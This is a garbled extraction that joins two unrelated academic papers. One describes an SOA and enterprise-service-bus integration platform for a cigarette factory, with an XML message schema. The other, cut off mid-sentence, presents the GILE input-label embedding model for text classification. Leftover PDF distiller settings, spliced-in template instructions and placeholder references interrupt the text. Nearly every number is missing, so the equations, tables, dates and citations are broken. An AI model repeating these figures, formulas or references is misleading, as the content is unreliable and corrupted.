e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - research on enterprise application integration platform based on soa architecture liu pingping school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com lu jiaxing school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com abstract—tobacco industry is a relatively early industry in china' information industry, so there are many problems, such as the lack of overall planning, the wide application system, but the low degree of integration of information resources, and the serious problem of "information island". in order to solve how to establish an efficient and flexible way of information interaction within the enterprise, an enterprise application integration platform based on soa architecture is proposed. the platform takes esb as the core, transforms enterprise information integration into a new way conforming to soa architecture, and establishes the idea of basic data management, so as to achieve the purpose of optimizing the overall information resources of the enterprise keywords-soa framework; information interaction; esb; information integration i. introduction soa is widely used in the it industry in the st century. soa is service oriented architecture, service oriented architecture. it is architecture, not a technology or a method. we can also say that soa is an idea. in china, many enterprises begin to build enterprise integration platform based on soa. for example, kingdee apusic soa. fmqm exotica, developed by almaden laboratory of ibm company, is a distributed workflow management system based on persistent message queue, which can save the execution information of workflow through persistent message queue and complete the complete independence of all nodes in the execution process soa architecture has three significant advantages: loose coupling, coarse granularity, and location protocol transparency. through the encapsulation of services to achieve a comprehensive loose coupling, loose coupling can reduce the dependency between services, so that the flexibility of the service itself can be improved, and it will not be forced to adjust because of other services adjustment, thus greatly improving the reusability of services. coarse granularity means that the interface of services defined in soa is close to the actual user operation. location protocol transparency means that when accessing the service defined by soa, you do not need to know the specific location and transport protocol of the service. even if the location and transport protocol of the service change, the client that invokes the service does not need to change. based on the investigation and analysis of the problems of information island, high coupling degree and poor integration expansibility of each system in bj cigarette factory based on soa architecture, an enterprise application integration platform design scheme suitable for the actual situation of the enterprise is proposed to solve the current problems. therefore, through the research on the practical application of the enterprise application integration platform based on soa architecture in cigarette enterprises, through the research on soa architecture and esb technology, combined with the analysis of the actual problems of information integration in cigarette manufacturing enterprises, this paper puts forward the design scheme of the enterprise application integration platform that adapts to the actual situation of enterprises. ii. the current situation tobacco industry is an industry with an early start of information construction in china. at present, the level of information is generally high. bj cigarette factory, as the main cigarette manufacturing enterprise in shaanxi province, has many application systems after years of information construction, covering all aspects of the factory from production to management. the main information systems include manufacturing execution (mes) system and enterprise industrial international journal of advanced network, monitoring and controls volume , no. , resource planning (erp) system, logistics system, data acquisition system in the car room, centralized control system in the silk making workshop, power and energy management system, human resource management system, enterprise card system, etc. the more application systems there are, the problem is not only the disunity of basic data, but also the complexity of system integration. the traditional integration method generally adopts the point-to-point mode. each system needs a special channel to integrate chengdu. as shown in figure , the integration of n application systems will generate n * (n- ) integration channels with high complexity. when new application systems need to be integrated, the complexity improvement will also be exponential. figure . integration complexity in summary, the current informatization problems of bj cigarette factory mainly include the following aspects: ) there are some isolated information islands and some application systems are in information closed state due to lack of external integration means. ) the basic data in the enterprise is scattered in different application systems, which need to be maintained separately, so it is difficult to ensure the unity of the basic data of the whole enterprise, so as to "count out one place". the lack of a unified basic data code system makes information interaction difficult. ) basic data depends on business system and has high coupling. at present, the basic data in the enterprise mainly depends on erp system, and the purpose of the basic data is to provide the most basic data information for all application systems of the whole enterprise, so relying on a single application system will cause unnecessary impact on the users of other basic data. ) poor integration scalability. at present, the information system of the whole enterprise adopts the point-to-point integration mode. if the new application system wants to join the integration system, it needs the cooperation of each application system. the upgrading or transformation of the existing application system also needs to involve a lot of external interface changes, because of this poor scalability. ) the lack of management and monitoring of data interaction process makes it difficult to find and deal with problems in the process of data interaction in time. some data have high requirements for timeliness. if it can not be communicated in time, it will have a significant impact on the actual business. therefore, effective management and monitoring measures are needed for the data interaction process. ) the integration of point-to-point results in the aggravation of network burden, and many data interaction contents are repeated, but the data can not be reused, resulting in the waste of resources. through the analysis and optimization of the current problems of the enterprise, the core of which is to establish a reasonable and efficient way of information integration. in recent years, with the continuous development of information integration technology and the formulation of a series of standards and specifications, a new solution is gradually being paid attention to, which is based on service oriented architecture the enterprise application integration (eai) of architecture (soa) regards each application system in the enterprise as the service unit of soa architecture, and establishes the enterprise application integration platform to realize the information integration between each application system. in this enterprise application integration platform, an enterprise service bus (esb) is needed to provide standardized services. enterprise service bus is the service operation support platform in soa architecture, and the services encapsulated by other application systems run on this service bus, as shown in figure , its establishment can effectively optimize the current enterprise ' s disordered and meshed integration mode. secondly, we need to establish a data exchange management platform to manage all services running in the enterprise service bus and monitor the data interaction process in the integration. finally, we need to establish a basic data management platform, as a service provider in the soa architecture, to provide basic data management functions for other application systems. the basic data international journal of advanced network, monitoring and controls volume , no. , management platform will integrate the basic data of other application systems and manage them uniformly. other systems do not need to be managed separately. figure . schematic diagram of optimized enterprise integration channel iii. design and implementation because ibm wmb is used as the enterprise service bus, ibm db will be used as the database and ibm was (websphere application server) will be used as the application server for better overall stability. according to the demand analysis, the data exchange platform as the enterprise service bus will provide a unified entry service ws? mb. after other application systems call the service, the esb will parse and route the called messages, and find the corresponding registered business processing webservice to call. the data exchange management platform is responsible for the management and monitoring of ibm wmb enterprise service bus. in the data exchange management platform, it is necessary to register, modify, disable, reuse and other management functions for the service processing business. at the same time, the data exchange management platform should also realize the log recording of data sending, so as to complete the monitoring of data exchange process. figure . technical framework of the platform iv. design of enterprise service bus date exchange platform as the core module of enterprise application integration platform, data exchange platform needs to undertake the important work of message transmission. as shown in figure , it is a basic data exchange process. the data exchange platform publishes a unified entry service ws? mb through the web service. the service caller calls the service first, and sends the call request to the data exchange platform in the form of xml message. the data exchange platform will analyze the message content, find the actual service to call, and send the message to the actual, the actual service provider will return the processed results to the data exchange platform in the form of xml message, and then the data exchange platform will return to the original caller. figure . flow chart of data exchange international journal of advanced network, monitoring and controls volume , no. , finally, complete content and organizational editing before formatting. please take note of the following items when proofreading spelling and grammar: a. abbreviations and acronyms define abbreviations and acronyms the first time they are used in the text, even after they have been defined in the abstract. abbreviations such as ieee, si, mks, cgs, sc, dc, and rms do not have to be defined. do not use abbreviations in the title or heads unless they are unavoidable the request message sent by the service caller should contain complete routing information, so how to define the routing information? in fact, from the process of data exchange, it can be seen that the three elements of data sender, data receiver and the service to be called can constitute a unique data process, so the routing information should also contain three elements. unified format definition of service call request xml message: <?xml version=" . " encoding="gb "?> <msg> <head> < id > < id > / / message id or serial number < name > < name > / / message description < source > < source > / / data source < target > < target > / / data destination < sername > < / sername > / / call service id < msgtype > < / msgtype > / / type of message ( : normal : request : answer) < rtcode > < / rtcode > / / the return value of the corresponding request ( : success : failure) < rtdesc > < / rtdesc > / / return description of the corresponding request < backup > < backup > / / standby information <backup ></backup > <backup ></backup > < date > xxxx / xx / xx xx: xx: xx < / date > / / message sending time </head> <data> <table tablename = 'table name ' fieldname = 'column description' fieldname = 'column description' fieldname = 'column description'... > <row action = insert 'id = ' primary key value 'fieldname = ' aaa ' fieldname = ' bbb '... > <table tablename = ' table name ' fieldname = ' column description' fieldname = ' column description' fieldname = ' column description'... > <row action = 'insert' id = '' fieldname = 'aaa' fieldname ='bbb' .../> </row> </table> </row> < / table > / / the main body of the data sent. table represents a data table. row is the specific data. table can be nested in table to represent the data of the main sub table structure. </data> </msg> in the xml definition, the head part describes the basic information of the data, and the three attributes of source, target and sername are the most important routing information. through these three attributes, you can uniquely determine the service that the data needs to call, that is, the user of the service, the provider of the service and the name of the service. these attributes are registered by the service management module and are in the unified portal after receiving the xml data, the service calls the corresponding service according to the three attributes and the service registration information in the management module to send the data. v. implementation the main functions of data exchange management platform are service management and data exchange process monitoring. as shown in figure , it is the main interface of the data exchange management platform. the frequency of data exchange can be calculated through the log, and the reception and transmission volume of each system and data accessing the platform can be displayed intuitively. international journal of advanced network, monitoring and controls volume , no. , figure . main interface of data exchange management platform a) the function of service governance is realized by registering and managing the web service published by each application system. as shown in figure , the contents to be registered include: sequence number, system name, interface name, enabling tag, source, target, interface service name and webserviceurl, namespace, calling method input object, input parameter name, output parameter name, calling method output object, extended input parameter, extended input parameter value, authentication information, webservice technology, remarks, etc. (due to confidentiality reasons, the figure is not complete). b) figure is the implementation interface of the authority management function of the management platform for basic data. the maintenance of basic data is usually carried out by the personnel in charge of specific business. different business personnel are usually responsible for different data. the authority management module can configure the addition, modification, deletion and query authority of various basic data according to different roles, and can also configure whether specific attributes are visible the rbac mode is implemented. figure . data operation module international journal of advanced network, monitoring and controls volume , no. , first, configure different roles in role management, then configure the permissions of roles through role and function relationship, and finally configure the roles of different users through role and user relationship or user and role relationship. a user can have multiple roles, and a role can be played by multiple users at the same time. figure is the implementation of the data synchronization module of the basic data management platform. by customizing the interface content and configuring different sending interfaces for different systems, you can configure whether the attribute column of the basic data is sent, the name of the sent column, etc., and you can also filter and group the sent content through sql statements. figure . authority management figure . definition of interface service other application systems publish and register the service of receiving basic data in the data exchange management platform. after the basic data management platform configures the interface, when the new basic data maintenance is completed, the platform will automatically send the data to the corresponding system through the data exchange platform according to the interface configuration. all application systems adopt this mode, and the basic data is unified. international journal of advanced network, monitoring and controls volume , no. , vi. conclusion in this paper, through understanding the application status of soa architecture in bj cigarette enterprise, the enterprise integrated information system based on soa architecture is proposed to solve the problems of the enterprise's current information island, high coupling between various systems, and poor integration and expansion. the basic data management platform manages and synchronizes the basic data of the whole enterprise in a centralized way, so as to solve the integration problem of application systems caused by the data inconsistency. references [ ] li zi, yang bin. application of enterprise service bus technology (esb) in large enterprises [j]. information technology, , : - . [ ] lu hongwei. enterprise application integration solution based on soa and esb [j]. computer application and software, , : - . [ ] chen lingping. design and implementation of unified application service interface platform based on soa [j]. network security technology and application, , : k. elissa, “title of paper if known,” unpublished. [ ] jin baohua, he zhenyuan, zhang liang, et al. analysis and design of data sharing and exchange platform based on soa [j]. journal of zhengzhou institute of light industry (natural science edition), , : - . [ ] du wanya. design and implementation of soa framework based on esb [d]. beijing: beijing jiaotong university, . [ ] zhang jun. research and implementation of distributed esb bus based on soa architecture [d]. nanjing: nanjing university of technology, . [ ] wang li, ye weiquan. planning and design of anyan tobacco data center based on soa architecture [j]. computer knowledge and technology, , : - . [ ] electronic publication: digital object identifiers (dois): [ ] lin yuqin, huang chenhui. research on esb framework for enterprise application integration [j]. computer application, , : - . [ ] ma ruijuan, he lili. research on data exchange service system of tobacco industry based on esb [j]. computer programming skills and maintenance, , : - . none gile: a generalized input-label embedding for text classification nikolaos pappas james henderson idiap research institute, martigny , switzerland {nikolaos.pappas,james.henderson@idiap.ch} abstract neural text classification models typically treat output labels as categorical variables which lack description and semantics. this forces their parametrization to be depen- dent on the label set size, and, hence, they are unable to scale to large label sets and generalize to unseen ones. existing joint input-label text models overcome these is- sues by exploiting label descriptions, but they are unable to capture complex label re- lationships, have rigid parametrization, and their gains on unseen labels happen often at the expense of weak performance on the labels seen during training. in this paper, we propose a new input-label model which generalizes over previous such models, ad- dresses their limitations, and does not com- promise performance on seen labels. the model consists of a joint non-linear input- label embedding with controllable capacity and a joint-space-dependent classification unit which is trained with cross-entropy loss to optimize classification performance. we evaluate models on full-resource and low- or zero-resource text classification of multilin- gual news and biomedical text with a large label set. our model outperforms monolin- gual and multilingual models which do not leverage label semantics and previous joint input-label space models in both scenarios. introduction text classification is a fundamental nlp task with numerous real-world applications such as topic recognition (tang et al., ; yang et al., ), sentiment analysis (pang and lee, ; yang et al., ), and question answering (chen et al., ; kumar et al., ). classification also ap- pears as a sub task for sequence prediction tasks such as neural machine translation (cho et al., ; luong et al., ), and summarization (rush et al., ). despite the numerous stud- ies, existing models are trained on a fixed label set using k-hot vectors and, therefore, treat target labels as mere atomic symbols without any partic- ular structure to the space of labels, ignoring po- tential linguistic knowledge about the words used to describe the output labels. given that seman- tic representations of words have been shown to be useful for representing the input, it is reason- able to expect that they are going to be useful for representing the labels as well. previous work has leveraged knowledge from the label texts through a joint input-label space, initially for image classification (weston et al., ; mensink et al., ; frome et al., ; socher et al., ). such models generalize to labels both seen and unseen during training, and scale well on very large label sets. however, as we explain in section , existing input-label models for text (yazdani and henderson, ; nam et al., ) have the following limitations: (i) their em- bedding does not capture complex label relation- ships due to its bilinear form, (ii) their output layer parametrization is rigid because it depends on the dimensionality of the encoded text and labels, and, (iii) they are outperformed on seen labels by clas- sification baselines trained with cross-entropy loss (frome et al., ; socher et al., ). in this paper, we propose a new joint input-label model which generalizes over previous such mod- els, addresses their limitations, and does not com- promise performance on seen labels (see figure ). the proposed model is comprised of a joint non-linear input-label embedding with control- lable capacity and a joint-space-dependent classi- fication unit which is trained with cross-entropy loss to optimize classification performance. the need for capturing complex label relationships is addressed by two non-linear transformations which have the same target joint space dimension- our code is available at: github.com/idiap/gile github.com/idiap/gile ality. the parametrization of the output layer is not constrained by the dimensionality of the in- put or label encoding, but is instead flexible with a capacity which can be easily controlled by choos- ing the dimensionality of the joint space. training is performed with cross-entropy loss, which is a suitable surrogate loss for classification problems, as opposed to a ranking loss such as warp loss (weston et al., ) which is more suitable for ranking problems. evaluation is performed on full-resource and low- or zero-resource scenarios of two text clas- sification tasks, namely on biomedical semantic indexing (nam et al., ) and on multilingual news classification (pappas and popescu-belis, ) against several competitive baselines. in both scenarios, we provide a comprehensive abla- tion analysis which highlights the importance of each model component and the difference with previous embedding formulations when using the same type of architecture and loss function. our main contributions are the following: (i) we identify key theoretical and practical lim- itations of existing joint input-label models. (ii) we propose a novel joint input-label embed- ding with flexible parametrization which gen- eralizes over the previous such models and addresses their limitations. (iii) we provide empirical evidence of the supe- riority of our model over monolingual and multilingual models which ignore label se- mantics, and over previous joint input-label models on both seen and unseen labels. the remainder of this paper is organized as fol- lows. section provides background knowledge and explains limitations of existing models. sec- tion describes the model components, training and relation to previous formulations. section describes our evaluation results and analysis, while section provides an overview of previous work and section concludes the paper and pro- vides future research directions. background: neural text classification we are given a collection d = {(xi,yi), i = , . . . ,n} made of n documents, where each document xi is associated with labels yi = {yij ∈ { , } | j = , . . . ,k}, and k is the total number of labels. each document xi = {w ,w , . . . ,wkitki} is a sequence of words grouped into sentences, with ki being the num- ber of sentences in document i and tj being the number of words in sentence j. each label j has a textual description comprised of multiple words, cj = {cj ,cj , . . . ,cjlj | j = , . . . ,k} with lj being the number of words in each description. given the input texts and their associated labels seen during the training portion of d, our goal is to learn a text classifier which is able to predict labels both in the seen, ys, or unseen, yu, label sets, defined as the sets of unique labels which have been seen or not during training respectively and, hence, y ∩yu = ∅ and y = ys ∪yu. . input text representation to encode the input text, we focus on hierarchical attention networks (hans), which are competitive for monolingual (yang et al., ) and multilin- gual text classification (pappas and popescu-belis, ). the model takes as input a document x and outputs a document vector h. the input words and label words are represented by vectors in ird from the same embeddings e ∈ ir|v|×d, where v is the vocabulary and d is the embedding dimension; e can be pre-trained or learned jointly with the rest of the model. the model has two levels of abstraction, word and sentence. the word level is made of an encoder network gw and an attention network aw, while the sentence level similarly in- cludes an encoder and an attention network. encoders. the function gw encodes the sequence of input words {wit | t = , . . . ,ti} for each sen- tence i of the document, noted as: h(it)w = gw(wit), t ∈ [ ,ti], ( ) and at the sentence level, after combining the in- termediate word vectors {h(it)w | t = , . . . ,ti} to a sentence vector si ∈ irdw (see below), where dw is the dimension of the word encoder, the func- tion gs encodes the sequence of sentence vectors {si | i = , . . . ,k}, noted as h (i) s . the gw and gs functions can be any feed-forward (dense) or recurrent networks, e.g. gru (cho et al., ). attention. the αw and αs attention mechanisms, which estimate the importance of each hidden note that depending on the number of labels per docu- ment the problem can be a multi-label or multi-class problem. this statement holds true for multilingual classification problems too if the embeddings are aligned across languages. state vector, are used to obtain the sentence si and document representation h respectively. the sen- tence vector is thus calculated as follows: si = ti∑ t= α(it)w h (it) w = ti∑ t= exp(v>ituw)∑ j exp(v > ijuw) h(it)w , ( ) where vit = fw(h (it) w ) is a fully-connected net- work with ww parameters. the document vector h ∈ irdh , where dh is the dimension of the sen- tence encoder, is calculated similarly, by replacing uit with vi = fs(h (i) s ) which is a fully-connected network with ws parameters, and uw with us, which are parameters of the attention functions. . label text representation to encode the label text we use an encoder func- tion which takes as input a label description cj and outputs a label vector ej ∈ irdc ∀j = , . . . , k. for efficiency reasons, we use a simple, parameter- free function to compute ej , namely the average of word vectors which describe label j, namely ej = lj ∑lj t= cjt, and hence dc = d in this case. by stacking all these label vectors into a ma- trix, we obtain the label embedding e ∈ ir|y|×d. in principle, we could also use the same encoder functions as the ones for input text, but this would increase the computation significantly; hence, we keep this direction as future work. . output layer parametrizations . . typical linear unit the most typical output layer, consists of a linear unit with a weight matrix w ∈ irdh×|y| and a bias vector b ∈ ir|y| followed by a softmax or sigmoid activation function. given the encoder’s hidden representation h with dimension size dh, the probability distribution of output y given input x is proportional to the following quantity: p(y|x) ∝ exp(w>h + b). ( ) the parameters in w can be learned separately or be tied with the parameters of the embedding e by setting w = et if the input dimension of w is restricted to be the same as that of the embedding e (d = dh) and each label is represented by a single word description i.e. when y corresponds to v and e = e. in the latter case, eq. becomes: p(y|x) ∝ exp(eh + b). ( ) either way, the parameters of such models are typ- ically learned with cross-entropy loss, which is suitable for classification problems. however, in both cases they cannot be applied to labels which are not seen during training, because each label has learned parameters which are specific to that label, so the parameters for unseen labels cannot be learned. we now turn our focus to a class of models which can handle unseen labels. . . bilinear input-label unit joint input-output embedding models can gener- alize from seen to unseen labels because the pa- rameters of the label encoder are shared. the previously proposed joint input-output embedding models by yazdani and henderson ( ) and nam et al. ( ) are based on the following bi- linear ranking function f(·): f(x,y) = ewh, ( ) where e ∈ ir|y|×d is the label embedding and w ∈ ird×dh is the bilinear embedding. this func- tion allows one to define the rank of a given label y with respect to x and is trained using hinge loss to rank positive labels higher than negative ones. but note that the use of this ranking loss means that they do not model the conditional probability, as do the traditional models above. limitations. firstly, the above formula can only capture linear relationships between encoded text (h) and label embedding (e) through w. we argue that the relationships between different labels are non-linear due to the complex interactions of the semantic relations across labels but also between labels and different encoded inputs. a more ap- propriate form for this purpose would include a non-linear transformation σ(·), e.g. with either: (a) σ(ew)︸ ︷︷ ︸ label structure h or (b) e σ(wh)︸ ︷︷ ︸ input structure . ( ) secondly, it is hard to control their output layer capacity due to their bilinear form, which uses a matrix of parameters (w) whose size is bounded by the dimensionalities of the label embedding and the text encoding. thirdly, their loss function optimizes ranking instead of classification perfor- mance and thus treats the ground-truth as a ranked list when in reality it consists of one or more inde- pendent labels. summary. we hypothesize that these are the rea- sons why these models do not yet perform well on seen labels compared to models which make use of the typical linear unit, and they do not take full advantage of the structure of the problem when tested on unseen labels. ideally, we would like to have a model which will address these issues and will combine the benefits from both the typical lin- ear unit and the joint input-label models. the proposed output layer paramet- rization for text classification we propose a new output layer parametrization for neural text classification which is comprised of a generalized input-label embedding which captures the structure of the labels, the structure of the en- coded texts and the interactions between the two, followed by a classification unit which is indepen- dent of the label set size. the resulting model has the following properties: (i) it is able to cap- ture complex output structure, (ii) it has a flexi- ble parametrization which allows its capacity to be controlled, and (iii) it is trained with a classi- fication surrogate loss such as cross-entropy. the model is depicted in figure . in this section, we describe the model in detail, showing how it can be trained efficiently for arbitrarily large label sets and how it is related to previous models. . a generalized input-label embedding let gin(h) and gout(ej) be two non-linear projec- tions of the encoded input, i.e. the document h, and any encoded label ej, where ej is the jth row vector from the label embedding matrix e, which have the following form: e′j = gout(ej) = σ(eju + bu) ( ) h′ = gin(h) = σ(v h + bv), ( ) where σ(·) is a nonlinear activation function such as relu or tanh, the matrix u ∈ ird×dj and bias bu ∈ irdj are the linear projection of the labels, and the matrix v ∈ irdj×dh and bias bv ∈ irdj are the linear projection of the encoded input. note that the projections for h′ and e′j could be high- rank or low-rank depending on their initial dimen- sions and the target joint space dimension. also let e′ ∈ ir|y|×dj be the matrix resulting from pro- jecting all the outputs ej to the joint space, i.e. gout(e). the conditional output probability distribution h' e u v ∧h' e classification unit w y ∧y … joint space h' ek yk ∧ … label encoder cj cj cjlj ... ei input encoder w w wkitki ... h encoders dh x dj d x dj w or d em be dd ing s ' ' ' t figure : each encoded text and label are projected to a joint input-label multiplicative space, the output of which is processed by a classification unit with label- set-size independent parametrization. can now be re-written as: p(y|x) ∝ exp ( e′h′ ) ∝ exp ( gout(e)gin(h) ) ∝ exp ( σ(eu + bu)︸ ︷︷ ︸ label structure σ(v h + bv)︸ ︷︷ ︸ input structure ) . ( ) crucially, this function has no label-set-size de- pendent parameters, unlike w and b in eq. . in principle, this parametrization can be used for both multi-class and multi-label problems by defining the exponential in terms of a softmax and sigmoid functions respectively. however, in this paper we will focus on the latter. . classification unit we require that our classification unit parameters depend only on the joint input-label space above. to represent the compatibility between any en- coded input text hi and any encoded label ej for this task, we define their joint representation based on multiplicative interactions in the joint space: g (ij) joint = gin(hi) �gout(ej), ( ) where � is component-wise multiplication. the probability for hi to belong to one of the k known labels is modeled by a linear unit which maps any point in the joint space into a score which indicates the validity of the combination: p (ij) val = g (ij) jointw + b, ( ) where w ∈ irdj and b are a scalar variables. we compute the output of this linear unit for each known label which we would like to predict for a given document i, namely: p (i) val =   p (i ) val p (i ) val . . . p (ik) val   =   g (i ) jointw + b g (i ) jointw + b . . . g (ik) jointw + b   . ( ) for each row, the higher the value the more likely the label is to be assigned to the document. to ob- tain valid probability estimates and be able to train with binary cross-entropy loss for multi-label clas- sification, we apply a sigmoid function as follows: ŷi = p̂(yi|xi) = + e−p (i) val . ( ) summary. by adding the above changes to the general form of eq. the conditional probabil- ity p(yi|xi) is now proportional to the following quantity: exp ( σ(eu + bu)(σ(v h + bv) �w) + b ) . ( ) note that the number of parameters in this equa- tion is independent of the size of the label set, given that u, v , w and b depend only on dj, and k can vary arbitrarily. this allows the model to scale up to large label sets and generalize to un- seen labels. lastly, the proposed output layer ad- dresses all the limitations of the previous models, as follows: (i) it is able to capture complex struc- ture in the joint input-output space, (ii) it provides a means to easily control its capacity dj, and (iii) it is trainable with cross-entropy loss. . training objectives the training objective for the multi-label classifi- cation task is based on binary cross-entropy loss. assuming θ contains all the parameters of the model, the training loss is computed as follows: l(θ) = − nk n∑ i= k∑ j= h(yij, ŷij), ( ) where h is the binary cross-entropy between the gold label yij and predicted label ŷij for a docu- ment i and a candidate label j. we handle multiple languages according to fi- rat et al. ( ) and pappas and popescu-belis ( ). assuming that Θ = {θ ,θ , ...,θm} are all the parameters required for each of the m lan- guages, we use a joint multilingual objective based on the sum of cross-entropy losses: l(Θ) = − z ne∑ i m∑ l k∑ j= h(y(l)ij , ŷ (l) ij ), ( ) where z = nemk with ne being the num- ber of examples per epoch. at each iteration, a document-label pair for each language is sam- pled. in addition, multilingual models share a certain subset of the encoder parameters during training while the output layer parameters are kept language-specific, as described by pappas and popescu-belis ( ). in this paper, we share most of the output layer parameters, namely the ones from the input-label space (u, v, bv, bu), and we keep only the classification unit parameters (w, b) language-specific. . scaling up to large label sets for a very large number dj of joint-space di- mensions in our parametrization, the computa- tional complexity increases prohibitively because our projection requires a large matrix multiplica- tion between u and e, which depends on |y|. in such cases, we resort to sampling-based training, by adopting the commonly used negative sampling method proposed by mikolov et al. ( ). let xi ∈ ird and yik ∈ { , } be an input-label pair and ŷik the output probabilities from our model (eq. ). by introducing the sets kpi and k n i , which contain the indices of the positive and negative la- bels respectively for the i-th input, the loss l(θ) in eq. can be re-written as follows: = − z n∑ i= k∑ j= [ yij log ŷij + ȳij log ( − ŷij) ] = − z n∑ i= [ kpi∑ j= log ŷij + kni∑ j= log ( − ŷij) ] , ( ) where z = nk and ȳij is ( − yij). to reduce the computational cost needed to evaluate ŷij for all the negative label set kni , we sample k ∗ la- bels from the negative label set with probability p = |kni | to create the set kni . this enables training on arbitrarily big label sets without increasing the computation required. by controlling the number of samples we can drastically speed up the train- ing time, as we demonstrate empirically in sec- tion . . . exploring more informative sampling methods, e.g. importance sampling, would be an interesting direction of future work. . relation to previous parametrizations the proposed embedding form can be seen as a generalization over the input-label embeddings with a bilinear form, because its degenerate form is equivalent to the bilinear form of eq. . in par- ticular, this can be simply derived if we set one of the two non-linear projection functions in the second line of eq. to be the identity function, e.g. gout(·) = i, set all biases to zero, and make the σ(.) activation function linear, as follows: σ(eu + bu)σ(v h + bv) = (ei) (v h) = ev h �, ( ) where v by consequence has the same number of dimensions as w ∈ ird×dh from the bilinear input-label embedding model of eq. . experiments the evaluation is performed on large-scale biomedical semantic indexing using the bioasq dataset, obtained by nam et al. ( ), and on multilingual news classification using the dw cor- pus, which consists of eight language datasets ob- tained by pappas and popescu-belis ( ). the statistics of these datasets are listed in table . . biomedical text classification we evaluate on biomedical text classification to demonstrate that our generalized input-label model scales to very large label sets and performs better than previous joint input-label models on both seen and unseen label prediction scenarios. . . settings we follow the exact evaluation protocol, data and settings of nam et al. ( ), as described below. we use the bioasq task a dataset, which is a collection of scientific publications in biomedical research. the dataset contains about m docu- ments labeled with around labels out of , , which are defined according to the medical sub- ject headings (mesh) hierarchy. the data was minimally pre-processed with tokenization, num- ber replacements (num), rare word replacements (unk), and split with the provided script by year so that the training set includes all documents until and the ones from to were kept for the test set, this corresponded to , , docu- ments for training and , , for testing. for validation, a set of , documents were ran- domly sampled from the training set. we report the same ranking-based evaluation metrics as nam et al. ( ), namely rank loss (rl), average pre- cision (avgpr) and one-error loss (oneerr). dataset documents labels abbrev. # count # words w̄d # count w̄l bioasq , , , , . dw , , , . – en , , , . – de , , , . – es , , . – pt , , . – uk , , . – ru , , . – ar , , . – fa , , . table : dataset statistics: #count is the number of documents, #words are the number of unique words in the vocabulary v, w̄d and w̄l are the average number of words per document and label respectively. our hyper-parameters were selected on valida- tion data based on average precision as follows: -dimensional word embeddings, encoder, at- tention (same dimensions as the baselines), joint input-label embedding of , batch size of , maximum number of words per document and words per label, relu activation, . % nega- tive label sampling, and optimization with adam until convergence. the word embeddings were learned end-to-end on the task. the baselines are the joint input-label models from nam et al. ( ), noted as [n ], namely: • wsabie+: this model is an extension of the original wsabie model by weston et al. ( ), which instead of learning a ranking model with fixed document features, it jointly learns features for documents and words, and is trained with the warp ranking loss. • aitextml: this model is the one proposed by nam et al. ( ) with the purpose of learning jointly representations of docu- ments, labels and words, along with a joint input-label space which is trained with the warp ranking loss. the scores of the wsabie+ and aitextml base- lines in table are the ones reported by nam et al. ( ). in addition, we report scores of a word- level attention neural network (wan) with dense encoder and attention followed by a sigmoid out- here, the word embeddings are included in the parameter statistics because they are variables of the network. model layer form dim seen labels unseen labels params abbrev. output #count rl avgpr oneerr rl avgpr oneerr #count [n ] wsabie+ ewht . . . . . . . m aitextml avg ewht . . . . . . . m aitextml inf ewht . . . . . . . m b as el in es wan w>ht – . . . – – – . m bil-wan [yh ] σ(ew)wht . . . . . . . m bil-wan [n ] ewht . . . . . . . m o ur s gile-wan σ(eu)σ(v ht) . . . . . . . m − constrained dj σ(ew)σ(wht) . . . . . . . m − only label (eq. a) σ(ew)ht . . . . . . . m − only input (eq. b) eσ(wht) . . . . . . . m table : biomedical semantic indexing results computed over labels seen and unseen during training, i.e. the full-resource versus zero-resource settings. best scores among the competing models are marked in bold. put layer, trained with binary cross-entropy loss. our model replaces wan’s output layer with a generalized input-label embedding layer and its variations, noted gile-wan. for comparison, we also compare to bilinear input-label embedding versions of wan for the model by yazdani and henderson ( ), noted as bil-wan [yh ], and the one by nam et al. ( ), noted as bil- wan [n ]. note that the aitextml parameter space is huge and makes learning difficult for our models (linear wrt. labels and documents). in- stead, we make sure that our models have far fewer parameters than the baselines (table ). . . results the results on biomedical semantic indexing on seen and unseen labels are shown in table . we observe that the neural baseline, wan, outper- forms wsabie+ and aitextml on the seen la- bels, namely by + . and + . points in terms of avgpr respectively. the differences are even more pronounced when considering the ranking loss and one error metrics. this result is compati- ble with previous findings that existing joint input- label models are not able to outperform strong su- pervised baselines on seen labels. however, wan is not able to generalize at all to unseen labels, hence the wsabie+ and aitextml have a clear advantage in the zero-resource setting. in contrast, our generalized 